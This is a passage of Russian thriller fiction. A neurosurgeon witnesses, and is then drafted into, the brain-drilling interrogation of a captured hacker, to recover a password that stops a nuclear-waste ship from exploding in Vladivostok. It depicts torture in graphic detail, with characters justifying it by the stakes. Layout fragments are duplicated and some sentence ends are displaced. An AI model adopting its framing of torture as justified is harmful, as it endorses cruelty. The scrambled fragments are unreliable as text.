оживление шлема. Над двумя полусферами засияли 
яркие огоньки. 

- Как вы можете видеть, - не отрываясь от 
микроскопа, проговорил Лозински, - в данный момент 
я активизировал два датчика, наиболее близко 
расположенные к очагу блокированного воспоминания. 
Они сейчас создают двухмерную карту проникновения 
сверла (на этом слове человек непроизвольно стонет 
и кусает губу), после чего будет дана команда для 
подстройки третьей координаты. Предвосхищая вопросы 
- анестезия будет минимальной, он должен потом 
будет еще ответить на вопросы четко и правильно. 

”Я лучше выйду”, - услышал Хасс за спиной. Чьи-то 
шаги постепенно затихли за дверью аудитории. Тем 
временем Лозински что-то продолжал шептать себе под 
нос и через примерно полминуты громко вскрикнул: 

- Ну, вот и третья координата готова! 

Человек в кресле выгнулся дугой и замычал от 
ужаса. Все было готово. Один из ассистентов 
выполнил укол в напряженную руку подопытного 
”образца”, после чего тот заметно расслабился и 
продолжал тихонько рыдать, облизывая слезы с лица. 
Активность полусфер на шлеме заметно возросла, 
послышался тонкий свист. Человек в кресле дернулся, 
но не издал ни звука. А потом Хасс почувствовал, 
как до него долетел запах, знакомый уже много лет, 
- запах паленой кости. Высокооборотное сверло в 
мгновение ока пронзило тонкий слой кожи, разбросав 
кровавые пылинки примерно на полметра вокруг, и 
погрузилось в свод черепа. На выполнение 
трепанационных отверстий понадобилось всего полторы 
- две минуты. Под шлемом что-то щелкнуло; Лозински 
презрительно наморщил нос и при помощи 
дистанционного управления добавил мощности 
кондиционерам. Запах быстро выветрился. 

- Все остальное совершается уже без участия 
человека, - прокомментировал Лозински, - если кто- 
то еще хочет выйти, пусть лучше сделает это 
сейчас, до внедрения. 

Слово ”внедрение” было сказано так, как в 
нацистской Германии произносилось слово ”расстрел”, 
- спокойно, но с полным знанием дела. Еще 
несколько человек, трезво взвесив шансы своей 
нервной системы, вышли из зала на улицу, 
трясущимися пальцами доставая из карманов сигареты. 
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Этому 
несчастному 
проломила череп 
жена, дважды 
ударив его 
молотком — если 
судить по 
рассказам 
адвоката, за то, 
что пострадавший 
съел весь шоколад 
в доме, не оставив 
супруге ничего на 
сладкое. 


Лозински проводил их недовольным взглядом, но потом, заново оглядев оставшихся, 
остался доволен - крепких людей было еще довольно много. 
Тем временем человек в кресле получил минутную передышку; он тяжело дышал, 
понимая весь ужас своего положения - в его черепе сейчас зияли три круглых 
трепанационных отверстия. Он максимально закатил глаза кверху, пытаясь увидеть 
окровавленные жала в шлеме; и в эту секунду три тонких электрода скользнули 
внутрь его головы по сформированным каналам. 
Так уж устроен мозг - он не чувствует боли. Самый большой нервный конгломерат 
организма не приспособлен к тому, чтобы ощущать, - он создан командовать, 
повелевать, направлять и контролировать. Что-либо иное ему не доступно. Так 
случилось и сейчас - никакой боли не было. Но человек ощутил чужое присутствие 
в своей голове настолько ярко, что закричал так, будто в его тело вонзился 
раскаленный железный прут. Зрители непроизвольно втянулись в свои кресла; Хасс 
отшатнулся в сторону, его сердце забилось со все возрастающей быстротой. 
Успокойтесь, коллеги, - с усмешкой успокаивал Клаус Лозински, - это всего 
лишь аггравация, не все так плохо! Вполне возможно, что он что-то чувствует, но 
страх усилил его переживания во много раз! 
Объяснение не произвело должного эффекта, люди продолжали в ужасе смотреть на 
происходящее. 
- Зачем вы нам все это показываете? - отважился кто-то с последнего ряда на 
вопрос. - Черт возьми, я не ожидал подобного! 
- Если бы вы знали, что прячет мозг этого человека; если бы вы знали, к чему 
сейчас стремятся электроды, вы бы так не спрашивали! - грозно ответил Лозински. 
- Его тайна стоит того, чтобы сейчас здесь происходило все это! 
”Что должен скрывать этот несчастный, чтобы мы вместе с ним сейчас терпели все 
эти муки!” - в порыве внутреннего содрогания подумалось Хассу. 
Тем временем компьютер просчитал необходимый для раздражения очага мозга 
импульс. Руки человека в кресле затряслись, он стал громко шептать: ”Нет! Нет! 


Нельзя!..”. Лозински подошел к нему, подкатив маленький столик с несколькими 
листами бумаги и ручкой. 
- Пишите! - властно приказал он страдающему в кресле мужчине. Тот, не 


поворачивая головы, зафиксированной зажимами, одними глазами нашел ручку; 
ремень на правой руке ослабили. Пальцы цепко обхватили перо и, не повинуясь 
человеку, метнулись к бумаге; царапая листы, человек торопливо писал, строчка 
за строчкой. Лозински придерживал листок одним пальцем, требовательно глядя в 
лицо человека, по которому несколькими ручейками текла кровь из ран в черепе. 
Бешеный темп сменился явной усталостью, сознание иссякало, информация 
заканчивалась; ручка, в последний раз разорвав бумагу, упала на пол. Клаус взял 
в руки лист, просмотрел его, торжествующе поднял над головой. 

Через неприметную дверь в одной из стен зала в аудиторию вошел мужчина в шляпе 
и плаще. Клаус заметил его, кивнул и протянул исписанный лист бумаги. Человек, 
подойдя вплотную к Лозински, вначале взглянул на того, кто сейчас умирал в 
кресле, - взглянул внимательно, словно хотел убедиться, что мозг несчастного 
выдал всю информацию без остатка; потом резко обернулся, выхватил листок у 
Лозински и впился в него глазами. 

Ознакомившись с содержимым, он потер морщину на лбу и грустно произнес самому себе: 


- Все оказалось так просто... А вы, Миллер, крепкий орешек, - обратился он 
через плечо к человеку в кресле. -’Судя по тому, что я сейчас вижу на этом 
листе, - корпорация потеряла ценного сотрудника. Вы просто виртуоз в своем 
деле... Тем хуже оказалось для вас. Прощайте. 

И он кивнул Лозински. Тот понимающе опустил глаза. 

- Попрошу увести господина Миллера, - попросил он ассистентов. Те безо всяких 


эмоций включили механизм извлечения электродов, после чего сняли со вскрытой 
черепной коробки шлем. Сам Миллер был уже без сознания. Подхватив его под руки, 
ассистенты утащили тело в дверь подсобного помещения за кафедрой. Глаза Хасса 
были прикованы к листу бумаги, оставшемуся на столике, - на нем были видны 
глубокие следы, которые оставил Миллер, сильно нажимая на перо, - при желании 
их можно было прочитать. Поборов себя, он отвел глаза в сторону, чтобы никто в 
зале не заметил его интереса, потом осторожно огляделся. 

Листы на столике не интересовали никого - аудитория гудела, переваривая и 
осмысливая увиденное. С профессиональной точки зрения все продемонстрированное 
было крайне интересно - вычислены некоторые центры мозга, абсолютно точно 
отвечающие за предполагаемые функции; произведено воздействие с заранее 
запрограммированным результатом; сам результат можно было сразу взять в руки, 
прочитать, просмотреть. Джордж был, конечно же, поражен экспериментом, но не 
настолько, чтобы совсем потерять голову и начать рассыпаться в комплиментах 
перед Лозински, который сейчас принимал поздравления от группы ученых; Клаусу 
пожимали руки, подобострастно заглядывали в Глаза, просили разрешения 
присутствовать на других экспериментах (что Хассу было вообще непонятно - 
взглянуть на весь этот ужас еще раз его не смог бы заставить никто). 

Хасс потихоньку продвигался к листу, оставшемуся единственным доказательством 
произошедшего в этом зале несколько минут назад, аккуратно положил на него 
ладонь и аккуратно сгреб его в кулак. За общим гомоном в зале шороха бумаги не 
расслышал никто. Сунув комок в карман халата, Джордж прикрыл его носовым 
платком и неторопливо отошел в сторону; достал из другого кармана записную 
книжку, сделал вид, что вносит туда какие-то заметки, после чего, не глядя на 
своих коллег из клиники, вышел на улицу и торопливо направился в ближайшее кафе 
за углом. И только через десять-пятнадцать минут он понял, почему на него так 
косятся прохожие и посетители кафе - он до сих пор был в белом халате... 


Привычно булькал отсос, носик которого прильнул к краю раны. Кровь, разведенная 
до прозрачно-розового цвета физиологическим растворам, рвалась по пластиковой 
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В глубине раны зиял мозг. Блестящие извилины вздрагивали в такт пиканию «Лайфскопа». 


трубке в банку с пониженным давлением, стоящую у 
ног анестезиолога. Тот периодически по сигналу 
оператора ногой переключал тумблер на ней, и на 
несколько минут в операционной наступала тишина, 
прерываемая только звоном инструментов и краткими 
замечаниями хирургов. 

В глубине раны зиял мозг. Блестящие извилины 
вздрагивали в такт пиканию ”Лайфскопа”, отмечающего 
пульс. Хасс, выполняя заученные в течение многих 
лет манипуляции, не переставал думать о тех цифрах, 
что сумел прочитать на листке, забранном из 
аудитории. Комбинации цифр и слов; а в конце, там, 
где было разорвано, читалось слово ”простите”, 
написанное с маленькой буквы обрывающимися, 
недорисованными значками. К чему можно было 
применить эти цифры, Хасс не сумел придумать. Он 
сидел за компьютером несколько дней, анализируя 
содержимое листка. Он был уверен, что сумел 
восстановить все абсолютно точно, не пропустив ни 
одного знака. Один из его друзей, неплохо 
разбиравшийся в шифровании (будучи сотрудником 
отдела большой корпорации, разрабатывающей системы 
шифров для электронной почты), пытался помочь ему, 
но безрезультатно - для того чтобы решить проблему, 
надо было, как минимум, знать ее условие. Но Хасс 
не предполагал, что представляла собой данная 
комбинация из тридцати с лишним букв и цифр (слово 
”простите” Хасс отбросил за ненадобностью, так как 
предполагалось, что это - порыв души человека, 
предавшего что-то очень и очень серьезное). 

- ...Профессор, вы с нами? - раздался вопрос над 
ухом у Хасса. - Профессор?.. 

Хасс поднял глаза на операционную сестру, 
протягивающую ему бутылку с эфиром. 

- Пора, - кивнула она головой. - Этакрил готов. 
Хасс посмотрел на ее столик, где в лотке маленькой 
горочкой был насыпан розовый порошок, после чего 
перевел взгляд на ассистента. Тот молча кивнул - 
размеры были сняты. Профессор аккуратно взял из рук 
сестры лоток, откупорил бутылочку (по операционной 
мгновенно распространился резкий запах эфира) и 
вылил немного на розовый этакрил. Тот на глазах 
стал превращаться в пластмассу. Чуткие пальцы Хасса 
начали медленно и точно разминать получившийся 
мягкий комочек, постепенно распластывая его в 
лепешку неправильно овальной формы. 

Ассистент протянул ему стерильный шаблон. Хасс 
прикинул, насколько еще надо распластать этакрил, 
после чего сделал первую примерку. Лепешка не 
подошла. Джордж продолжил свою работу. Со второй 
попытки у него получилось. В получившемся щитке он 
высверлил три отверстия - в предполагаемых им 
углах дефекта черепа такие отверстия уже были 
подготовлены ассистентом - после чего уложил щиток 
и подтянул его лигатурами. Отверстие закрылось. 

- Сделайте инъекцию лазикса, - порекомендовал Хасс, 
- надо обезвоживать мозг, а иначе он не войдет в 
свои границы самостоятельно. 

Джордж вспомнил три трепанационных отверстия в 
черепе Миллера и еще раз посмотрел на только что 
выполненную работу. Этому несчастному проломила 
череп жена, дважды ударив его молотком - если 
судить по рассказам адвоката - за то, что 
пострадавший съел весь шоколад в доме, не оставив 
супруге ничего на сладкое. Сегодня Хасс закрыл ему 
вторую дырку (первая была удачно прикрыта около 
двух месяцев назад, на вторую операцию долго не 
могли найти деньги). Что хотела доказать жена, 
размахивая молотком? И что хотел узнать Лозински, 
сверля дырки в черепе человека, даже не 
погруженного в наркотический медикаментозный сон? 
Снимая перчатки, Хасс вновь вернулся к тем цифрам, 
что зазубрил практически наизусть. Это было что-то 
важное, иначе так не разделались бы с Миллером. 
Вернувшись в свой кабинет, Джордж включил свой 
компьютер и открыл файл, в котором хранились 
спасенные значки с Листка Миллера. Перед ним на 
экране появились два ряда цифр и букв. В который 
раз профессор всматривался в них и не понимал 
назначения каждой в отдельности и всех вместе. 

В дверь постучали - вежливо и одновременно 
настойчиво. Не дожидаясь приглашения Хасса, дверь 


распахнулась и впустила внутрь человека, от одного 
вида которого профессор покрылся холодным потом - 
тот самый человек в плаще и шляпе, который забрал 
оригинал признания Миллера после эксперимента с 
МОЗГОМ. 

- Разрешите представиться, Макс Осборн, служба 


контрразведки, - коротко бросил человек, 
одновременно оглядываясь в поисках места, куда 
можно было бы положить шляпу. - Вы не поможете? 


Он протянул шляпу Хассу, попутно расстегивая плащ 
и всем своим видом показывая, что он здесь 

надолго. Джордж медленно поднялся, ткнув пальцем в 
клавиатуру и запустив скринсейвер, после чего взял 
у Осборна шляпу, открыл неприметную в стене дверь 
встроенного шкафа и положил шляпу на верхнюю 

полку. Плащ тот повесил уже сам, не забыв 

заглянуть внутрь шкафа, потом подошел к столу и 
сел напротив Хасса. 

- Ваш компьютер стоит экраном к окну, уважаемый 
профессор, - прищурив глаза, начал Осборн. - Из 
окна напротив при помощи мощной оптики уже давно 
выполнен снимок содержимого файла, который в данный 
момент открыт на вашем компьютере. Но что самое 
любопытное - уже давно, в первый же день, как 
только вы создали этот файл, в ваш компьютер 
”вошли” наши люди и изменили в этих цифрах всего 
одну - пока вы не успели их запомнить. Так что в 
течение всего этого времени вы прорабатываете 
несуществующую комбинацию. 

Взгляд Хасса застыл в одной точке. ”Кто эти люди? 

- лихорадочно размышлял он. - Служба контрразведки? 
Правда ли это? Что они хотят от меня?”. 

- Не бойтесь, Хасс, с вами не будет проведен 
эксперимент, подобный тому, что совершили с 
Миллером. Все несколько иначе. Я не буду 
рассказывать вам, как мы вычислили вас, но, черт 
побери, вы и сами должны были догадаться, что 
человека в белом халате в центре города запомнит 
очень много людей. 

Хасс понимал, что совершил ошибку еще тогда, когда 
сломя голову кинулся из аудитории с листком в 
кармане. Но он не был профессионалом и о многих 
вещах задумывался с большим опозданием. Но что его 
найдут так быстро, да еще и подменят цифру... Он 
не был готов к этому разговору. 

- Что вы знаете о ”Гринпис”? - неожиданно спросил 
Осборн у профессора. Хасс вздрогнул - настолько 
внезапно прозвучал вопрос. 

- Насколько я знаю, ”Гринпис” - неправительственная 
внеполитическая организация, занимающаяся 
экологическими проблемами по всему миру. 
Деятельность ”Гринпис” активно освещается в 
средствах массовой информации и приносит достаточно 
много пользы окружающей среде... 

- Вы не на экзамене, господин Хасс, - удивленно 
возразил на эту тираду Макс. - К чему все это? 
Хотя я сам виноват, не скорректировал вопрос. 

Задам его иначе - вы когда-нибудь видели, чтобы 
”Гринпис” реально кого-то спас или защитил? 

Джордж задумался. В голове пронеслась череда 
фактов, связанных с экологическими катастрофами, с 
разливом нефти, с атомными испытаниями, с гибелью 
вымирающих видов животных; в голове хороводом 
летали такие названия, как Муруроа, Арал, Невада... 
Самым главным воспоминанием, связанным с ”Гринпис”, 
были кадры из Си-Эн-Эн - огромный атомный 

подводный крейсер в надводном положении размеренным 
темпом движется к учебному полигону, а вокруг него 
выписывает кренделя надувная моторка с надписью 
”Гринпис” на борту, а человек из этой лодки что-то 
кричит в мегафон. 

- Я предвосхищу ваш ответ, профессор, - вторгся в 
воспоминания Хасса Осборн. - Они не помогли никому 
и никогда. Это все сплошная показуха, - 
презрительно процедил он сквозь зубы. - 
считаете? 

Хасс оторопело ждал продолжения. Он вообще не 
понимал, что происходит. 

Тем временем казалось, что Макс вообще исчез из 
этой комнаты и перенесся куда-то далеко отсюда, где 
он уже сталкивался с ”Гринпис” и потерпел какое-то 
серьезное поражение. Взгляд Осборна остекленел, сам 
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...Во-первых, 
Миллер отчетливо 
заговорил на 
неизвестном 
языке; агент, 
приглашенный по 
этому поводу 
Осборном, с 
порога установил, 
что это орабский. 
Во-вторых, 
Миллер стал вслух 
перемножать 
огромные числа, 
которые 
произносил сам 
себе словно в 
бреду - и ответы 
были 
правильными. В- 
третьих, к концу 
второго дня он 


он стал похож на каменное изваяние; только пальцы методично постукивали по столу 
рядом с разглаженным листком бумаги. Профессор застыл сам, боясь нарушить эту 
тишину, - он ожидал от Макса теперь любых вопросов на любые темы. 

Неожиданно раздался тоненький писк, который вывел из ступора Осборна. Этот писк 
шел прямо из уха контрразведчика, из наушника, который был в него вставлен. 
Макс вздрогнул, выслушал все, что ему сообщили и вновь посмотрел на Хасса. 

- Прелюдия закончена, профессор, - сказал он. - Мое начальство требует, чтобы 
вам были объяснены условия задачи. 

Джордж, все это время так и простоявший у дверей шкафа, вернулся на свое 
место, не отрывая взгляд от Макса. Ноги предательски стали ватными, как во 
время его первых операций, когда знаешь, что скрывается за черепной коробкой, 
но всякий раз нежное вещество мозга оказывалось вблизи кусачек абсолютно 
неожиданно - пока Хасс не научился терпеливо, микрон за микроном, идти к цели. 
- Пункт первый, - начал излагать Осборн. - Миллер не умер. Он находится в 
клинике Лозински в отделении реанимации; его жизнь поддерживается на некоем 
уровне, достаточном для повторного эксперимента. Не надо дергаться, - поднял 
руку Осборн, увидев, как Хасс рванулся из кресла. - Это просто пункт первый. 
Теперь пункт второй. Три дня назад в одной из наших служб, отвечающей за 
перемещение, хранение и утилизацию ядерных отходов, случилось чрезвычайное 
происшествие - сотрудник, отвечающий за совершение транзакций по доставке этих 
самых отходов к местам утилизации (для простоты назовем его Джон Смит, 
поскольку нам придется достаточно часто упоминать о нем), придя утром на 
работу, обнаружил, что главная страница сервера, с которой имеется доступ к 
разрешению операций с продуктами цепных реакций, изменена. На нее выложен текст 
из официального обращения ”Гринпис” ко всем государствам-участникам соглашения 
против уничтожения ядерных отходов в странах третьего мира, в частности, тот 
самый фрагмент, где описываются все ужасы последствий данных мероприятий. Это 
было бы не так страшно, если бы вышеупомянутый сотрудник не понял с первых же 
секунд работы, что пароль на вход в систему изменен. 

Макс закинул ногу на ногу и подобнее устроился в кресле. 

- Пункт третий. Пять дней назад этот самый Джон дал ”добро” на выполнение 
очередной транзакции по годовому плану президента. Из порта Аляски вышел 
сухогруз с секретным контейнером, предназначенным для захоронения в одной из 
стран Африки. Джон вел этот сухогруз по контрольным точкам. Объясняю для вас, 
Лжордж, что это значит. 

Вы прекрасно осведомлены, что после создания международной антитеррористической 
коалиции крайне ужесточился контроль за источниками ядерной энергии, могущими 
послужить сырьем для создания атомной бомбы. Это отразилось и на службе, 
представляемой Джоном Смитом. Любое транспортное средство (в данном случае 
корабль) идет к намеченной цели по контрольным точкам, в каждой из которых 
получает сигнал, разрешающий продвижение на одну точку вперед. Это означает, 
что район ближайшего следования проверен антитеррористическими службами и 
безопасен для перемещения груза... 

Хасс попытался задать встречный вопрос, но Осборн не дал ему этого сделать. 

- Да, вы правы, Хасс, а вдруг испортится погода или двигатели перегреются, или 
еще что-нибудь... В этом случае агент, находящийся на корабле, должен отправить 
специальный сигнал, означающий не запланированную, но штатную ситуацию. 
Существует и обратная возможность - если вдруг Джон Смит опоздает на работу, 
потому что его собьет машина или если сам дьявол лично решит встать на пути 
корабля и сообщит об этом президенту, или нечто в этом духе. Тогда компьютер 
сам даст сигнал на корабль - сигнал, приказывающий прекратить движение. Агент, 
находящийся на корабле, принял такой сигнал три дня назад. Он имеет право на 
недельный дрейф. Сигнал будет поступать к нему ежедневно в течение недели. На 
восьмые сутки придет другой сигнал - у сухогруза откроются кингстоны, OH 
опустится на глубину в полтора километра и будет взорван при помощи нескольких 
мин высокой мощности. Ядерные отходы рассеются по району огромной площади и не 
будут представлять потенциального интереса для террористов. 

Хасс машинально перевернул ”мышку” и, вытащив шарик, тер его о ладонь. 

- Пункт четвертый, - ледяным голосом продолжал Осборн. - Таким образом, еще 
четыре дня корабль будет цел; транзакция еще не завершена. По ее законам она 
может быть либо выполнена полностью, либо никак. В данном случае ”никак” не 
существует - отходы будут захоронены в любом случае, неважно где, в Африке или 


Макс встал, прошелся по кабинету, достал сигарету и, не спросив разрешения у 


- Тут начинается самое интересное - то, что привело меня к вам. Как вы 
понимаете, службы подобного рода очень восприимчивы к хакерским штучкам - даже 
если они срабатывают, то всегда есть человек, способный отследить воздействие. 
Надеюсь, вы не верите в сказки типа ”юный гений всех взломал”? Следы остаются 
всегда. Умение найти их отражается на банковском счете безопасников. И они 
нашли. Очень быстро. Как оказалось потом, подозрительно быстро. Да этот человек 
- Миллер - особенно и не прятался. Его взяли через пятнадцать часов. Миллера 
допрашивал я сам. Никакого эффекта. Он был передан в руки людей, умеющих 
оказывать воздействие на любом доступном уровне - физическом, психическом, 
химическом и еще неизвестно на каком. Все, что он рассказал, - то, что он из 
самой идейной части ”Гринспис”, занимающейся подобными акциями уже несколько 
лет. Они срывают учения атомных подводных лодок, они рассекречивают информацию 
о ядерных испытаниях, они оказывают давление на ученых, на политиков, на 
журналистов. Но пароль он не выдал. И тогда мы отправили его к Лозински. 
Джордж потихоньку приходил в себя, вспоминая Миллера в кресле со шлемом на 
голове. Да, действительно, эта голова хранила очень нужный секрет, но настолько 
ли он страшен, что для этого необходимо было так мучить человека? 


запел - на 
латыни... 
на дне океана. Пункт пятый... 
хозяина, закурил. 
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Надеюсь, вы не верите в сказки типа «юный гений всех взломал»? 


- Мы уже обращались к нему пару раз, - продолжал 
тем временем Осборн. - Результаты были 
положительные. В этот раз все больше походило на 
лекцию, но пришло время рассекретить этот метод, 
ибо Лозински претендует на Нобелевскую премию. Если 
вы помните, перед самой лекцией вы подписывали кое- 
какие документы - там был листок с предупреждением 
о неразглашении; именно ради него вы и ставили 
подписи под ничего не значащими бумагами. Как вы 
помните, пароль мы сумели узнать - это те самые 
цифры и контрольное слово, по иронии судьбы слово 
”простите”. Но это ничего не решило... 

Макс затушил сигарету и выбросил ее в приоткрытое 
окно. Потом обернулся к Хассу и нервно заговорил: 
- Он оказался очень хитрым, этот Миллер. Я не знаю, 
зачем он пошел на это дело, но факты говорят 
следующее - когда Джон Смит ввел вырванный из 
Миллера пароль, то выяснилось, что этот подлец 
сделал гораздо больше, чем мы могли предполагать. 
Он создал еще один парольный уровень между главной 
страницей и базой данных. Мы уперлись в замок, на 
этот раз еще более сложный. Восемь 
двенадцатизначных комбинаций цифр и букв, которые 
меняются местами каждые два часа. Понимаете, на что 
рассчитывал он или те, кто направил его на это? 
(Хасс непонимающе наклонил голову, ожидая 
продолжения - ему ничего не приходило в голову). 

- Неужели вы не догадываетесь, профессор? - едва 
ли не истерически рассмеялся Макс, что вряд ли 
было свойственно агенту его уровня. - Он знал, что 
он умрет после атаки Лозински! Он - камикадзе! Мы 
думали, что с таким трудом вырвали пароль у 
фанатика, а он на самом деле отдавал нам его таким 
способом лишь с одной целью - умереть прямо там, в 
кресле, чтобы мы не смогли вытащить из него 
дешифратор для второго уровня! 

Осборн машинально вытащил еще одну сигарету, смял 
ее и швырнул следом за первой. 

- И самое главное. Пункт шестой и последний. К 
нашему великому счастью, Миллер остался жив. Его 
мозг еще в состоянии выдать нам информацию. Вы 
должны помочь Лозински сделать это. У вас есть 
четыре дня. Если в течение девяноста шести часов 
вы с ним не найдете ответа, случится катастрофа. 
Все дело в том, что сухогруз получил приказ об 
остановке во время плановой якорной стоянки во 
Владивостоке. Он не сможет затонуть в бухте. И 
через четыре дня взрыв разнесет на куски не только 
его, но и целый город с двумя миллионами жителей. 
Джордж понял, что больше всего на свете он хочет 
пить. Глаза его уперлись в дверцу холодильника, за 
которой скрывались несколько баночек колы. Потом он 
перевел взгляд на Осборна. 

- Почему я? 

- Клаус рекомендовал именно вас. Он считает, что 
именно вы с вашим богатым опытом исследования зон 
мозга в состоянии оценить те центры, которые надо 
атаковать повторно. 

- Но его мозг частично разрушен, вы ведь прекрасно 
понимаете... - начал было Хасс, но Макс не стал 
дослушивать. 

- Если мы не попытаемся это делать, нас никто не 
поймет, - сказал он. - Никто. Мозг Миллера в вашем 
распоряжении. Клаус Лозински делает сейчас все 
возможное, чтобы сохранить ему жизнь и поддержать 
его сознание на должном уровне. Вы пойдете со мной 
прямо сейчас. Домой звонить не надо - агенты 
известят вашу семью согласно ”спецлегенде”. Всем 
необходимым вы будете обеспечены на месте. Да ведь 
это всего на четыре дня... А потом вы вернетесь 
домой при любом исходе мероприятия. 

Хасс стянул с себя халат и бросил на спинку 
кресла. 

- Но у меня же лекции... А послезавтра две 
операции... И почему все это случилось именно со 
мной? - попытался возмутиться он. 

- Поверьте, Хасс, - с вами не случилось ничего. 
Проблема сейчас у двух миллионов жителей 
Владивостока. 

Джордж нелепо взмахнул руками, словно отгоняя от 
себя наваждение - еще полчаса назад ничего этого 
не было, все шло своим чередом, и вот - иди и 


спасай два миллиона человек! Хасс хотел что-то 
сказать Осборну, вздохнул - и промолчал; добавить 
что-либо было невозможно. Он оглядел кабинет, взял 
с полки пару книг, положил их обратно; из верхнего 
ящика стола взял две ручки с золотым пером и сунул 
их во внутренний карман пиджака. 

Макс постучал ногтем по циферблату наручных часов: 
- Пора, Джордж. Там всем обеспечат. Надо спешить. 
Хасс в последний раз оглядел кабинет; они вышли в 
коридор. Замок в двери громко щелкнул. Они быстро 
прошли по лестничным пролетам и сели в подъехавший 
”Мерседес”, который унес их за город в клинику 
Лозински. 


- Надо было быть осторожнее, Клаус, - 
требовательно произнес Хасс. За последние двое 
суток они очень сблизились с этим эксцентричным 
ученым и перешли на ”ты”. - Можешь представить 
плотность нервных клеток на этом участке... 

- К черту! - огрызнулся Лозински. - Время идет. Я 
буду ”бомбить” все центры, вычисленные компьютером 
по нашей методике. Миллер должен откликнуться! 

Два профессора стояли у огромного окна, занимавшего 
всю верхнюю полусферу реанимационного зала, в 
котором лежал сейчас Миллер. Его кровать стояла 
тремя метрами ниже разговаривающих ученых; чтобы 
увидеть Миллера, им пришлось подойти к самому 
краю, туда, где обычно толпятся студенты, 
заглядывая внутрь и изучая работу отделения 
интенсивной терапии. Уже два дня прошло в 
бесплодных попытках взломать мозги террориста; 
Клаус изобретал новые подходы буквально с нуля, он 
предлагал довольно необычные решения - типа 
зондирования по полям (что напомнило Хассу принцип 
дистанционного разминирования, применяемый в 
артподготовке массивного наступления - орудия бьют 
по площадям не только с целью погасить огневые 
точки противника, но и для детонации минных полей, 
расположенных на пути наступающих войск). Это 
привело к неожиданным результатам. 

Во-первых, Миллер отчетливо заговорил на 
неизвестном языке; агент, приглашенный по этому 
поводу Осборном, с порога установил, что это 
арабский. Во-вторых, Миллер стал вслух перемножать 
огромные числа, которые произносил сам себе словно 
в бреду - и ответы были правильными. В-третьих, к 
концу второго дня он запел - на латыни. Хасс 
покрылся липким потом, когда услышал, как из уст 
находящегося в состоянии ступора_ человека 
вырываются размеренные строчки ”Гаудеамуса”; стоит 
отметить, голос у Миллера был никудышный. И это 
были все результаты, которых добились два 
нейрохирурга за прошедшее время. 

Сам Миллер не считал, что время прошло зря - он 
вообще ничего не считал, не замечал и не видел. 
Все это время он находился в состоянии 
медикаментозного сна, отрешившись от окружающего 
мира стеной сновидений и фантазий. Он грезил; его 
мозг, будучи разбуженным массивными излучениями, 
синтезировал огромное количество ярких красок и 
фантастических видений. Периодически Лозински 
выводил его из этого состояния, пытаясь вступить в 
контакт - безрезультатно. Показания приборов 
свидетельствовали - Миллер в такие минуты все 
прекрасно видит и слышит, но говорить не хочет, 
прикидываясь спящим. Терпение Лозински подошло к 
концу; во время последнего сеанса внедрения (в 
черепе Миллера к тому времени уже зияло около 
двадцати трепанационных отверстий), когда террорист 
едва не скончался от передозировки анестетика, он 
вспылил, сорвал злость на одной из молоденьких 
анестезисток, швырнул на пол маску и вылетел из 
реанимации как пуля. Хасс и сам держался из 
последних сил, не позволяя себе никаких эмоций по 
той причине, что в клинике Клауса он был в гостях. 
Время работало сейчас на руку террориста. Еще 
сорок восемь часов - и команда ”Кингстоны открыть, 
забортную воду впустить!” поступит на главный 
компьютер сухогруза ”Фаворит”; группа спецназа, 
сопровождающая груз, покинет корабль на вертолете 
за три часа до детонации мин. Капитан покинет 
транспорт последним на быстроходном катере, 
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гипноза были 
непредсказуемы. 
Миллер начал что- 
то бессвязно 
бормотать, в 
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военную тематику 
— перечислял 
виды оружия, их 
технические 
характеристики, 
вспомнил фюрера, 
Пол Пота, 
Пиночета, потом 
перекинулся на 
религиозные 
проповеди. 


проконтролировав работу таймеров. И в бинокль ему будет хорошо виден взрыв на 
глубине в тридцать метров - сухогруз даже не сможет полностью погрузиться в 
мутные маслянистые воды бухты Золотой Рог. Взрывная волна опрокинет десятки 
судов в акватории, снесет сотни домов, густо усеявших окружающие бухту сопки, 
вместе с людьми, их населяющими, и всколыхнет облачный покров над огромной 
парковой зоной... 

Хасс тряхнул головой, отгоняя навязчивое видение, преследующее его в течение 
последнего дня. Работу нельзя было прекращать ни на минуту. Он вернулся в 
палату и присел на стул рядом с функциональной кроватью, приподнятой в 
полусидячее положение. Миллера в данный момент кормили через зонд - насильно, 
предотвращая еще один способ самоубийства через голодовку. Джордж настойчиво 
пытался себе представить, что именно нужно пробудить в мозгу этого человека, 
чтобы заставить назвать пароли или принцип шифрования. Что могло бы быть в 
случае, если вторую страницу на сервере организовал не Миллер, Хасс просто 
боялся себе представить. 

Анестезистка, выполняющая по совместительству роль палатной медсестры, аккуратно 
и методично отправляла при помощи огромного шприца Жане порции овощного пюре в 
пищевод Миллера. Она, как и все остальные в клинике, кроме Хасса и Лозински, 
понятия не имела о том, что совершил этот человек, и относилась к нему с 
определенной долей сострадания - не больше, но и не меньше, чем было необходимо 
в данной ситуации. Она испытывала эти чувства на протяжении уже двадцати лет - 
ровно столько, сколько работала в клинике Лозински. .. 

Привычным взглядом Хасс автоматически поглядывал на показатели на приборах, 
обеспечивающих жизнь Миллера. Все показатели были в норме; глаза по-прежнему 
закрыты, никаких лишних движений. Сестры сами перевернут, когда надо, 
помассируют спину, постучат по груди. 

Лжордж методично ковырялся в собственном мозгу, как на свалке информации. 
Сколько всего увидено и прочувствовано за многолетнюю практику, сколько 
полученного опыта - и все это не стоит сейчас ни гроша, потому что к разгадке 
мозга Миллера Хасс не приблизился ни на шаг. Он только понял, что перед ним 
убежденный, глубоко идейный человек - для своего уровня мышления. 

Вчера Лозински предложил пойти по пути, предложенном еще великим Фрейдом - 
свести все к бессознательному, погрузить Миллера в управляемый гипнотический 
транс для полного контроля над побуждениями и поступками. Так делалось довольно 
часто - но не в теперешнем положении. Так можно было отучить человека курить, 
так можно было пробудить давние воспоминания (в основном - очень старые, чем 
часто пользовались психиатры для разрешения проблем, корнями уходящими в 
детство). Хасс сразу предупредил Клауса, что подобными методами с Миллером 
ничего сделать не удастся, но упрямый Лозински все-таки испытал и этот способ, 
прикрываясь лозунгом Осборна: ”Должны быть использованы все возможные варианты 
для того, чтобы потом нашему президенту было что говорить на пресс- 
конференции. ..”. 

Результаты гипноза были непредсказуемы. Миллер начал что-то бессвязно 
бормотать, в основном на военную тематику - перечислял виды оружия, их 
технические характеристики, вспомнил фюрера, Пол Пота, Пиночета, потом 
перекинулся на религиозные проповеди. Судя по всему, когда-то в своей жизни он 
посетил святые места, о чем с гордостью сообщал, глядя перед собой невидящим 
взглядом. Управлять трансом не удалось - Миллер настойчиво стучался в только 
ему видимые двери; попытки Клауса нажать на психику не принесли плодов, 
террорист замолчал и надолго. К тому времени, как закончилось воздействие 
